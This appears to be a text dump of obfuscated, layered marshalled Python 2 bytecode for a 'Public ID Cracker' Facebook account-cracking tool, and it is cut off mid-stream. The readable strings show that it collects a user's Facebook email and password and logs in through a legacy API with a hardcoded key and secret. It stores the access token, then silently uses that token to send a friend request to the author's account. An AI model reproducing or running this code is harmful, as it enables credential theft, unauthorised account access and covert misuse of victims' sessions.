Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\
x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xfaV\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsdV\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xceU\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs8U\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa2T\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x0cT\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsvS\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xe0R\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsJR\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\
x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xb4Q\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x1eQ\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x88P\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf2O\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\\O\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xc6N\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs0N\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x9aM\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x04M\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x
02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsnL\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xd8K\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsBK\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xacJ\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x16J\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x80I\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xeaH\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsTH\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xbeG\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01
\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs(G\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x9c\x02\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x01\x00l\t\x00Z\t\x00d\x00\x00d\x01\x00l\n\x00Z\n\x00d\x00\x00d\x01\x00l\x0b\x00Z\x0b\x00d\x00\x00d\x01\x00l\x0c\x00Z\x0c\x00d\x00\x00d\x02\x00l\r\x00m\x0e\x00Z\x0e\x00\x01d\x00\x00d\x03\x00l\x0f\x00m\x10\x00Z\x10\x00\x01d\x00\x00d\x04\x00l\x0c\x00m\x11\x00Z\x11\x00\x01e\x12\x00e\x01\x00\x83\x01\x00\x01e\x01\x00j\x13\x00d\x05\x00\x83\x01\x00\x01e\x0c\x00j\x11\x00\x83\x00\x00Z\x14\x00e\x14\x00j\x15\x00e\x16\x00\x83\x01\x00\x01e\x14\x00j\x17\x00e\x0c\x00j\x18\x00j\x19\x00\x83\x00\x00d\x06\x00d\x07\x00\x83\x01\x01\x01d0\x00g\x01\x00e\x14\x00_\x1a\x00d\n\x00\x84\x00\x00Z\x1b\x00d\x0b\x00\x84\x00\x00Z\x1c\x00d\x0c\x00\x84\x00\x00Z\x1d\x00d\r\x00\x84\x00\x00Z\x1e\x00d\x0e\x00Z\x1f\x00d\x0f\x00\x84\x00\x00Z \x00d\x10\x00Z!\x00g\x00\x00Z"\x00g\x00\x00a#\x00g\x00\x00a$\x00g\x00\x00Z%\x00g\x00\x00Z&\x00d\x11\x00Z\'\x00d\x12\x00Z(\x00e\x00\x00j)\x00d\x13\x00\x83\x01\x00\x01d\x14\x00GHe\x1e\x00d\x15\x00\x83\x01\x00\x01e\x1e\x00d\x16\x00\x83\x01\x00\x01e\x1e\x00d\x17\x00\x83\x01\x00\x01e\x1e\x00d\x18\x00\x83\x01\x00\x01e\x1e\x00d\x19\x00\x83\x01\x00\x01e\x1e\x00d\x1a\x00\x83\x01\x00\x01e\x1e\x00d\x1b\x00\x83\x01\x00\x01d\x1c\x00GHd\x1d\x00GHd\x1e\x00GHd\x1f\x00GHd 
\x00GHd!\x00GHd"\x00GHd#\x00GHd$\x00GHe\x1e\x00d%\x00\x83\x01\x00\x01d&\x00GHe\x02\x00j*\x00d\x07\x00\x83\x01\x00\x01e\x00\x00j)\x00d\'\x00\x83\x01\x00\x01e\x02\x00j*\x00d\x07\x00\x83\x01\x00\x01e+\x00d(\x00\x83\x01\x00\x01d)\x00\x84\x00\x00Z,\x00d*\x00\x84\x00\x00Z-\x00d+\x00\x84\x00\x00Z.\x00d,\x00\x84\x00\x00Z/\x00d-\x00\x84\x00\x00Z0\x00d.\x00\x84\x00\x00Z1\x00e2\x00d/\x00k\x02\x00r\x98\x02e,\x00\x83\x00\x00\x01n\x00\x00d\x01\x00S(1\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\n\x00\x00\x00ThreadPool(\x01\x00\x00\x00t\x0f\x00\x00\x00ConnectionError(\x01\x00\x00\x00t\x07\x00\x00\x00Browsert\x04\x00\x00\x00utf8t\x08\x00\x00\x00max_timei\x01\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x16\x00\x00\x00d\x01\x00GHt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x0b\x00\x00\x00\x1b[1;91mExit(\x03\x00\x00\x00t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x06\x00\x00\x00keluar\x18\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x05\x01c\x01\x00\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00sS\x00\x00\x00d\x01\x00}\x01\x00d\x02\x00}\x02\x00x:\x00t\x00\x00D]2\x00}\x03\x00|\x02\x00d\x03\x00|\x01\x00t\x01\x00j\x02\x00d\x04\x00t\x03\x00|\x01\x00\x83\x01\x00d\x05\x00\x18\x83\x02\x00\x19\x17|\x03\x00\x177}\x02\x00q\x13\x00Wt\x04\x00|\x02\x00\x83\x01\x00S(\x06\x00\x00\x00Nt\x07\x00\x00\x00ahtdzjct\x00\x00\x00\x00t\x01\x00\x00\x00!i\x00\x00\x00\x00i\x01\x00\x00\x00(\x05\x00\x00\x00t\x01\x00\x00\x00xt\x06\x00\x00\x00randomt\x07\x00\x00\x00randintt\x03\x00\x00\x00lent\x05\x00\x00\x00cetak(\x04\x00\x00\x00t\x01\x00\x00\x00bt\x01\x00\x00\x00wt\x01\x00\x00\x00dt\x01\x00\x00\x00i(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x04\x00\x00\x00acak\x1d\x00\x00\x00s\n\x00\x00\x00\x00\x01\x06\x01\x06\x01\r\x010\x01c\x
01\x00\x00\x00\x05\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s~\x00\x00\x00d\x01\x00}\x01\x00xA\x00|\x01\x00D]9\x00}\x02\x00|\x01\x00j\x00\x00|\x02\x00\x83\x01\x00}\x03\x00|\x04\x00j\x01\x00d\x02\x00|\x02\x00\x16d\x03\x00t\x02\x00d\x04\x00|\x03\x00\x17\x83\x01\x00\x16\x83\x02\x00}\x04\x00q\r\x00W|\x04\x00d\x05\x007}\x04\x00|\x04\x00j\x01\x00d\x06\x00d\x05\x00\x83\x02\x00}\x04\x00t\x03\x00j\x04\x00j\x05\x00|\x04\x00d\x07\x00\x17\x83\x01\x00\x01d\x00\x00S(\x08\x00\x00\x00NR\t\x00\x00\x00s\x03\x00\x00\x00!%ss\x07\x00\x00\x00\x1b[%s;1mi\x1f\x00\x00\x00s\x04\x00\x00\x00\x1b[0ms\x02\x00\x00\x00!0s\x01\x00\x00\x00\n(\x06\x00\x00\x00t\x05\x00\x00\x00indext\x07\x00\x00\x00replacet\x03\x00\x00\x00strR\x06\x00\x00\x00t\x06\x00\x00\x00stdoutt\x05\x00\x00\x00write(\x05\x00\x00\x00R\x11\x00\x00\x00R\x12\x00\x00\x00R\x14\x00\x00\x00t\x01\x00\x00\x00jR\x0c\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>R\x10\x00\x00\x00%\x00\x00\x00s\x0e\x00\x00\x00\x00\x01\x06\x01\r\x01\x0f\x01(\x01\n\x01\x12\x01c\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00x<\x00|\x00\x00d\x01\x00\x17D]0\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng{\x14\xaeG\xe1z\x84?(\x06\x00\x00\x00R\x06\x00\x00\x00R\x19\x00\x00\x00R\x1a\x00\x00\x00t\x05\x00\x00\x00flusht\x04\x00\x00\x00timet\x05\x00\x00\x00sleep(\x02\x00\x00\x00t\x01\x00\x00\x00zt\x01\x00\x00\x00e(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x05\x00\x00\x00jalan/\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x01s\xf1\x01\x00\x00\n\x1b[1;91m 
\xe2\x99\xa6\xe2\x99\xa6\xe2\x99\xa6\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\x1b[1;96m\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\x1b[1;94m\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\x1b[1;93m\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x99\xa6\xe2\x99\xa6\xe2\x99\xa6\n\x1b[1;91m,-. ,-. ;-. ,--. ,--. ,-. \n\x1b[1;92m| ) ( ` | ) | | | \\ \n\x1b[1;91m|-< `-. |-\' |- |- | | \n\x1b[1;92m| ) . ) | | | | / \n\x1b[1;91m`-\' `-\' \' `--\' `--\' `-\' \x1b[1;95m BOTOLBABA\n\xe2\x99\xa6\xe2\x99\xa6\xe2\x99\xa6\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\x1b[1;93m\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\x1b[1;94m\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\x1b[1;96m\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x80\x94\xe2\x99\xa6\xe2\x99\xa6\xe2\x99\xa6\nc\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sF\x00\x00\x00d\x01\x00d\x02\x00d\x03\x00g\x03\x00}\x00\x00x0\x00|\x00\x00D](\x00}\x01\x00d\x04\x00|\x01\x00\x17Gt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01t\x03\x00j\x04\x00d\x05\x00\x83\x01\x00\x01q\x16\x00Wd\x00\x00S(\x06\x00\x00\x00Ns\x04\x00\x00\x00. s\x04\x00\x00\x00.. s\x04\x00\x00\x00... 
s\x1b\x00\x00\x00\r\x1b[1;93mPlease Wait \x1b[1;93mi\x01\x00\x00\x00(\x05\x00\x00\x00R\x06\x00\x00\x00R\x19\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00(\x02\x00\x00\x00t\x05\x00\x00\x00titikt\x01\x00\x00\x00o(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x03\x00\x00\x00tik@\x00\x00\x00s\n\x00\x00\x00\x00\x01\x0f\x01\r\x01\x08\x00\r\x00i\x00\x00\x00\x00s\r\x00\x00\x00\x1b[31mNot Vulns\t\x00\x00\x00\x1b[32mVulnt\x05\x00\x00\x00cleart\x01\x00\x00\x00 s\x08\x00\x00\x00\x1b[1;93m s&\x00\x00\x00\x1b[1;91m,-. ,-. ;-. ,--. ,--. ,-. s&\x00\x00\x00\x1b[1;92m| ) ( ` | ) | | | \\ s&\x00\x00\x00\x1b[1;91m|-< `-. |-\' |- |- | | s&\x00\x00\x00\x1b[1;92m| ) . ) | | | | / s(\x00\x00\x00\x1b[1;91m`-\' `-\' \' `--\' `--\' `-\' s\x08\x00\x00\x00\x1b[1;96m s5\x00\x00\x00\x1b[1;90m PUBLIC ID CRACKER BY \x1b[1;96mBOTOL BABAs9\x00\x00\x00\x1b[1;97m--------------------------------------------------s\x07\x00\x00\x00\x1b[1;95ms!\x00\x00\x00 AUTHOR : MEHEDI HASAN ARIYANs$\x00\x00\x00 FACEBOOK : FACEBOOK.COM/THEMEHTANs&\x00\x00\x00 YOUTUBE : YOUTUBE.COM/MASTERTRICK1s$\x00\x00\x00 GITHUB : GITHUB.COM/BOTOLMEHEDIs\x07\x00\x00\x00\x1b[1;32ms2\x00\x00\x00--------------------------------------------------s\x07\x00\x00\x00\x1b[1;97ms2\x00\x00\x00\n\x1b[1;96mFIRST OF ALL SUBSCRIBE OUR YOUTUBE CHANNELs-\x00\x00\x00xdg-open https://www.Youtube.com/mastertrick1s\'\x00\x00\x00\n\x1b[1;96mPRESS ENTER TO OPEN MAIN MENU..c\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xc2\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x1a\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00}\x00\x00t\x03\x00\x83\x00\x00\x01Wn\x94\x02\x04t\x04\x00t\x05\x00f\x02\x00k\n\x00r\xbd\x02\x01\x01\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x06\x00GHd\x04\x00d\x05\x00\x14GHd\x06\x00GHt\x07\x00d\x07\x00\x83\x01\x00}\x01\x00t\x07\x00d\x08\x00\x83\x01\x00}\x02\x00t\x08\x00\x83\x00\x00\x01y\x11\x00t\t\x00j\x02\x00d\t\x00\x83\x01\x00\x01Wn 
\x00\x04t\n\x00j\x0b\x00k\n\x00r\xaf\x00\x01\x01\x01d\n\x00GHt\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\r\x00t\t\x00j\x0e\x00_\x0f\x00t\t\x00j\x10\x00d\x0b\x00d\x0c\x00\x83\x00\x01\x01|\x01\x00t\t\x00j\x11\x00d\r\x00<|\x02\x00t\t\x00j\x11\x00d\x0e\x00<t\t\x00j\x12\x00\x83\x00\x00\x01t\t\x00j\x13\x00\x83\x00\x00}\x03\x00d\x0f\x00|\x03\x00k\x06\x00r_\x02y.\x01d\x10\x00|\x01\x00\x17d\x11\x00\x17|\x02\x00\x17d\x12\x00\x17}\x04\x00i\x0b\x00d\x13\x00d\x14\x006d\x15\x00d\x16\x006|\x01\x00d\r\x006d\x17\x00d\x18\x006d\x19\x00d\x1a\x006d\x19\x00d\x1b\x006d\x1c\x00d\x1d\x006d\x1e\x00d\x1f\x006|\x02\x00d\x15\x006d \x00d!\x006d"\x00d#\x006}\x05\x00t\x14\x00j\x15\x00d$\x00\x83\x01\x00}\x06\x00|\x06\x00j\x16\x00|\x04\x00\x83\x01\x00\x01|\x06\x00j\x17\x00\x83\x00\x00}\x07\x00|\x05\x00j\x16\x00i\x01\x00|\x07\x00d%\x006\x83\x01\x00\x01d&\x00}\x03\x00t\x18\x00j\x19\x00|\x03\x00d\'\x00|\x05\x00\x83\x01\x01}\x08\x00t\x1a\x00j\x1b\x00|\x08\x00j\x1c\x00\x83\x01\x00}\t\x00t\x02\x00d\x02\x00d(\x00\x83\x02\x00}\n\x00|\n\x00j\x1d\x00|\t\x00d)\x00\x19\x83\x01\x00\x01|\n\x00j\x1e\x00\x83\x00\x00\x01d*\x00GHt\x00\x00j\x01\x00d+\x00\x83\x01\x00\x01t\x18\x00j\x1f\x00d,\x00|\t\x00d)\x00\x19\x17\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01Wq_\x02\x04t\x18\x00j \x00j!\x00k\n\x00r[\x02\x01\x01\x01d-\x00GHt\x0c\x00\x83\x00\x00\x01q_\x02Xn\x00\x00d.\x00|\x03\x00k\x06\x00r\x94\x02d/\x00GHt\x00\x00j\x01\x00d0\x00\x83\x01\x00\x01t"\x00j#\x00d1\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01q\xbe\x02d2\x00GHt\x00\x00j\x01\x00d0\x00\x83\x01\x00\x01t"\x00j#\x00d1\x00\x83\x01\x00\x01t$\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(3\x00\x00\x00NR%\x00\x00\x00s\t\x00\x00\x00login.txtt\x01\x00\x00\x00ri2\x00\x00\x00s\n\x00\x00\x00\x1b[1;96m\xe2\x96\xaasB\x00\x00\x00 \x1b[1;97m[\xe2\x97\x89] \x1b[1;96mLogin New Fresh Account \x1b[1;97m[\xe2\x97\x89]s7\x00\x00\x00 \x1b[1;97m[\xe2\x97\x89] \x1b[1;97mID/Email \x1b[1;91m: \x1b[1;92ms7\x00\x00\x00 \x1b[1;97m[\xe2\x97\x89] \x1b[1;97mPassword \x1b[1;91m: 
\x1b[1;92ms\x16\x00\x00\x00https://m.facebook.coms2\x00\x00\x00\n\x1b[1;96m[!] \x1b[1;91mThere is no internet connectiont\x02\x00\x00\x00nri\x00\x00\x00\x00t\x05\x00\x00\x00emailt\x04\x00\x00\x00passs\x0b\x00\x00\x00save-devicesG\x00\x00\x00api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=s`\x00\x00\x00format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=s;\x00\x00\x00return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32t \x00\x00\x00882a8490361da98702bf97a021ddc14dt\x07\x00\x00\x00api_keyt\x08\x00\x00\x00passwordt\x10\x00\x00\x00credentials_typet\x04\x00\x00\x00JSONt\x06\x00\x00\x00formatt\x01\x00\x00\x001t\x13\x00\x00\x00generate_machine_idt\x18\x00\x00\x00generate_session_cookiest\x05\x00\x00\x00en_USt\x06\x00\x00\x00locales\n\x00\x00\x00auth.logint\x06\x00\x00\x00methodt\x01\x00\x00\x000t\x14\x00\x00\x00return_ssl_resourcess\x03\x00\x00\x001.0t\x01\x00\x00\x00vt\x03\x00\x00\x00md5t\x03\x00\x00\x00sigs\'\x00\x00\x00https://api.facebook.com/restserver.phpt\x06\x00\x00\x00paramsR\x12\x00\x00\x00t\x0c\x00\x00\x00access_tokens$\x00\x00\x00\n\x1b[1;36;40m[\xe2\x9c\x93] Login Successful...s.\x00\x00\x00xdg-open http://www.www.facebook.com/TheMehtansM\x00\x00\x00https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=s+\x00\x00\x00\n\x1b[1;97m[!] There is no internet connectiont\n\x00\x00\x00checkpoints)\x00\x00\x00\n\x1b[1;97m[!] 
Your Account is on Checkpoints\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s\x1f\x00\x00\x00\n\x1b[1;97mPassword/Email is wrong(%\x00\x00\x00R\x05\x00\x00\x00t\x06\x00\x00\x00systemt\x04\x00\x00\x00opent\x04\x00\x00\x00menut\x08\x00\x00\x00KeyErrort\x07\x00\x00\x00IOErrort\x04\x00\x00\x00logot\t\x00\x00\x00raw_inputR$\x00\x00\x00t\x02\x00\x00\x00brt\t\x00\x00\x00mechanizet\x08\x00\x00\x00URLErrorR\x08\x00\x00\x00t\x04\x00\x00\x00Truet\x08\x00\x00\x00_factoryt\x07\x00\x00\x00is_htmlt\x0b\x00\x00\x00select_formt\x04\x00\x00\x00formt\x06\x00\x00\x00submitt\x06\x00\x00\x00geturlt\x07\x00\x00\x00hashlibt\x03\x00\x00\x00newt\x06\x00\x00\x00updatet\t\x00\x00\x00hexdigestt\x08\x00\x00\x00requestst\x03\x00\x00\x00gett\x04\x00\x00\x00jsont\x05\x00\x00\x00loadst\x04\x00\x00\x00textR\x1a\x00\x00\x00t\x05\x00\x00\x00closet\x04\x00\x00\x00postt\n\x00\x00\x00exceptionsR\x01\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00t\x05\x00\x00\x00login(\x0b\x00\x00\x00t\x05\x00\x00\x00tokett\x02\x00\x00\x00idt\x03\x00\x00\x00pwdt\x03\x00\x00\x00urlR;\x00\x00\x00t\x04\x00\x00\x00dataR\x0c\x00\x00\x00t\x01\x00\x00\x00aR\'\x00\x00\x00R\x1f\x00\x00\x00t\x07\x00\x00\x00unikers(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>R\\\x00\x00\x0